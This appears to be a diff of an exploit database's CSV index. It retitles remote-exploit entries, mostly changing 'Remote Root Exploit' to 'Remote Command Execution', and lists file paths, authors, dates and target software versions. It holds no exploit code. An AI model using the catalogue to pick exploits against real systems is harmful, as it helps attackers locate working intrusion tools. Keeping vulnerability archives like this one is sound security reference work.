 17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)",2011-06-23,Metasploit,windows,remote,0
 17460,platforms/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,windows,remote,0
-17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,kingcope,freebsd,remote,0
+17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Command Execution",2011-06-30,kingcope,freebsd,remote,0
 17467,platforms/windows/remote/17467.rb,"HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,windows,remote,5555
 17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)",2011-07-02,"muts and dookie",windows,remote,5555
 17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow (Metasploit)",2011-07-04,Metasploit,windows,remote,0
@@ -11037,7 +11040,7 @@ id,file,description,date,author,platform,type,port
 17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0
 17636,platforms/hardware/remote/17636.rb,"HP JetDirect PJL - Query Execution (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0
 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0
-17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Root Shell",2011-08-10,SZ,linux,remote,0
+17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Command Execution",2011-08-10,SZ,linux,remote,0
 17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0
 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,windows,remote,0
 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,windows,remote,0
@@ -11093,7 +11096,7 @@ id,file,description,date,author,platform,type,port
 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0
 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0
 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0
-18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit",2011-12-01,kingcope,freebsd,remote,0
+18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0
 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0
 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0
@@ -11157,7 +11160,7 @@ id,file,description,date,author,platform,type,port
 18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0
 18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0
 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0
-18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Root Remote Code Execution)",2012-05-26,muts,linux,remote,0
+18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Remote Code Execution)",2012-05-26,muts,linux,remote,0
 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote,0
 18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0
 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0
@@ -11338,7 +11341,7 @@ id,file,description,date,author,platform,type,port
 19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0
 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/Windows NT 4) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
-19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Root Exploit (2)",2012-07-01,kingcope,bsd,remote,0
+19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0
 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote,0
@@ -11543,7 +11546,7 @@ id,file,description,date,author,platform,type,port
 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0
 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0
 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0
-20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Root Remote Code Execution)",2012-07-24,muts,linux,remote,0
+20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Remote Command Execution)",2012-07-24,muts,linux,remote,0
 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0
 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0
 20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0
@@ -11786,7 +11789,7 @@ id,file,description,date,author,platform,type,port
 20594,platforms/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0
 20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote,0
 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0
-20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Root Exploit",1994-02-24,CIAC,unix,remote,0
+20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Command Execution",1994-02-24,CIAC,unix,remote,0
 20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 - SMTP Buffer Overflow",1999-02-13,_mcp_,windows,remote,0
 20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",multiple,remote,0
 20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 - nlps_server Buffer Overflow",1998-04-01,"Last Stage of Delirium",solaris,remote,0
@@ -12073,7 +12076,7 @@ id,file,description,date,author,platform,type,port
 21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)",2002-02-03,"Dave Wilson",php,remote,0
 21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)",2002-02-03,anonymous,php,remote,0
 21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)",2002-02-03,anonymous,php,remote,0
-21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Shell",2012-09-12,"Mattijs van Ommeren",hardware,remote,0
+21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0
 21274,platforms/windows/remote/21274.c,"MIRC 2.x/3.x/4.x/5.x - Nick Buffer Overflow",2002-02-03,"James Martin",windows,remote,0
 21276,platforms/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,multiple,remote,0
 21285,platforms/hardware/remote/21285.txt,"HP AdvanceStack Switch - Authentication Bypass",2002-02-08,"Tamer Sahin",hardware,remote,0
@@ -12354,13 +12357,13 @@ id,file,description,date,author,platform,type,port
 22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Length Account Compromise",2002-12-16,Andi,unix,remote,0
 22085,platforms/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Memory Corruption",2002-12-12,"Stefan Esser",unix,remote,0
 22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote,0
-22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQL Injection",2012-10-19,xistence,multiple,remote,0
+22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection",2012-10-19,xistence,multiple,remote,0
 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote,0
 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 - say() Format String",2002-12-16,"Marceta Milos",linux,remote,0
 22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,linux,remote,0
 22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 - Information Disclosure",2002-12-30,"Dennis Rand",windows,remote,0
 22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion",2002-12-30,"Dennis Rand",windows,remote,0
-22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Root Exploit",2003-01-06,"Carl Livitt",linux,remote,0
+22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Command Execution",2003-01-06,"Carl Livitt",linux,remote,0
 22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote,0
 22131,platforms/bsd/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",bsd,remote,0
 22135,platforms/linux/remote/22135.c,"TANne 0.6.17 - Session Manager SysLog Format String",2003-01-07,"dong-h0un yoU",linux,remote,0
@@ -12602,7 +12605,7 @@ id,file,description,date,author,platform,type,port
 23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Information Disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0
 23070,platforms/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal",2003-08-30,"Martin Eiszner",multiple,remote,0
 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",multiple,remote,0
-23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0
+23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution",2012-12-02,kingcope,windows,remote,0
 23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
 23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
 23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
@@ -12810,7 +12813,7 @@ id,file,description,date,author,platform,type,port
 23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote,0
 23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0
 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0
-23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution",2012-12-29,xistence,hardware,remote,0
+23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Authenticated Remote Command Execution",2012-12-29,xistence,hardware,remote,0
 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote,0
 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote,0
 23741,platforms/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy - Buffer Overrun",2004-02-23,kralor,windows,remote,0
@@ -12841,7 +12844,7 @@ id,file,description,date,author,platform,type,port
 23837,platforms/windows/remote/23837.txt,"IBM Lotus Domino 6.5.1 - HTTP webadmin.nsf Quick Console Cross-Site Scripting",2004-03-17,dr_insane,windows,remote,0
 23847,platforms/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,windows,remote,0
 23848,platforms/linux/remote/23848.txt,"SquidGuard 1.x - NULL URL Character Unauthorized Access",2004-03-19,"Petko Popadiyski",linux,remote,0
-23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0
+23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,hardware,remote,0
 23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,php,remote,0
 23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0
 23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0
@@ -12918,7 +12921,7 @@ id,file,description,date,author,platform,type,port
 24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0
 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote,0
 24196,platforms/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 - URI Obfuscation",2004-06-14,http-equiv,windows,remote,0
-24205,platforms/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0
+24205,platforms/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Command Execution",2013-01-18,"Gary Nilson",linux,remote,0
 24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0
 24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",multiple,remote,0
 24213,platforms/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 - Wildcard DNS Cross-Site Scripting",2004-06-15,"bitlance winter",windows,remote,0
@@ -13305,7 +13308,7 @@ id,file,description,date,author,platform,type,port
 26374,platforms/windows/remote/26374.txt,"Xerver 4.17 - Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0
 26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0
 26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server - URI Null Character Cross-Site Scripting",2005-10-19,"Ziv Kamir",windows,remote,0
-26412,platforms/hardware/remote/26412.pl,"Seowonintech Devices - Remote Root Exploit",2013-06-24,"Todor Donev",hardware,remote,0
+26412,platforms/hardware/remote/26412.pl,"Seowonintech Devices - Remote Command Execution",2013-06-24,"Todor Donev",hardware,remote,0
 26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module - 'Username' Command Execution (Metasploit)",2013-06-24,Metasploit,linux,remote,0
 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage - JustGetSNMPQueue Command Injection (Metasploit)",2013-06-24,Metasploit,windows,remote,2381
 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload (Metasploit)",2013-06-24,Metasploit,php,remote,0
@@ -13348,7 +13351,7 @@ id,file,description,date,author,platform,type,port
 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0
 27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0
 27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0
-27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - acsd Parameter Remote Root Shell",2013-07-27,"Jacob Holcomb",linux_mips,remote,0
+27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Parameter  Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote,0
 27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)",2013-07-27,Metasploit,multiple,remote,8080
 27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting",2006-01-30,"Chris Thomas",linux,remote,0
 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0
@@ -13802,7 +13805,7 @@ id,file,description,date,author,platform,type,port
 31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 - 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow",2008-01-11,anonymous,windows,remote,0
 31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 - URI SecURIty Bypass",2008-01-16,nnposter,hardware,remote,0
 31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 / uTorrent 1.6/1.7 - Peers Window Remote Code Execution",2008-01-16,"Luigi Auriemma",windows,remote,0
-31033,platforms/hardware/remote/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,remote,80
+31033,platforms/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,remote,80
 31039,platforms/windows/remote/31039.txt,"BitDefender Products - Update Server HTTP Daemon Directory Traversal",2008-01-19,"Oliver Karow",windows,remote,0
 31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.dll' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,windows,remote,0
 31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Buffer Overflow",2008-01-09,Knell,windows,remote,0
@@ -14261,7 +14264,7 @@ id,file,description,date,author,platform,type,port
 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0
 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote,0
 33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Parameter URI redirection",2010-04-25,"Aung Khant",multiple,remote,0
-33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Root Exploit",2007-09-25,mu-b,multiple,remote,0
+33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Command Execution",2007-09-25,mu-b,multiple,remote,0
 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0
 33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 - Directory Traversal",2010-04-27,"John Leitch",windows,remote,0
 33891,platforms/java/remote/33891.rb,"HP AutoPass License Server - Arbitrary File Upload (Metasploit)",2014-06-27,Metasploit,java,remote,5814
@@ -14353,7 +14356,7 @@ id,file,description,date,author,platform,type,port
 34523,platforms/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",multiple,remote,0
 34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0
 34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 - DLL Loading Arbitrary Code Execution",2010-08-30,"Ivan Markovic",windows,remote,0
-34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Root Code Execution",2014-09-09,eF,linux,remote,80
+34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Code Execution",2014-09-09,eF,linux,remote,80
 34621,platforms/unix/remote/34621.c,"Mozilla Firefox 3.6.8 - 'Math.random()' Cross Domain Information Disclosure",2010-09-14,"Amit Klein",unix,remote,0
 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote,0
 34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - Remote Code Execution (Metasploit)",2014-09-13,scriptjunkie,windows,remote,0
@@ -14404,7 +14407,7 @@ id,file,description,date,author,platform,type,port
 34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0
 34925,platforms/php/remote/34925.rb,"WordPress Plugin InfusionSoft - Arbitrary File Upload (Metasploit)",2014-10-09,Metasploit,php,remote,80
 34926,platforms/windows/remote/34926.rb,"Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,windows,remote,80
-34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Root Command Execution (Metasploit)",2014-10-09,Metasploit,unix,remote,443
+34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,unix,remote,443
 34931,platforms/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote,0
 34932,platforms/linux/remote/34932.html,"NitroView ESM - 'ess.pm' Remote Command Execution",2010-10-26,s_n,linux,remote,0
 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0
@@ -14677,7 +14680,7 @@ id,file,description,date,author,platform,type,port
 36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0
 36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0
 36681,platforms/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Parameter Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote,0
-36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000
+36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution (Metasploit)",2015-04-09,xort,linux,remote,8000
 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0
 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,windows,remote,0
 36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
@@ -14725,7 +14728,7 @@ id,file,description,date,author,platform,type,port
 37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0
 37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Buffer Overflow (PoC)",2015-06-01,metacom,windows,remote,0
 37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0
-37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0
+37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",hardware,remote,0
 37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0
 37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
 37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0
@@ -14981,7 +14984,7 @@ id,file,description,date,author,platform,type,port
 39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555
 39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution (Metasploit)",2016-02-10,Metasploit,hardware,remote,0
 39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0
-39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0
+39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,linux,remote,0
 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80
 39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
 39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0
@@ -15042,11 +15045,11 @@ id,file,description,date,author,platform,type,port
 40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0
 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
-40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
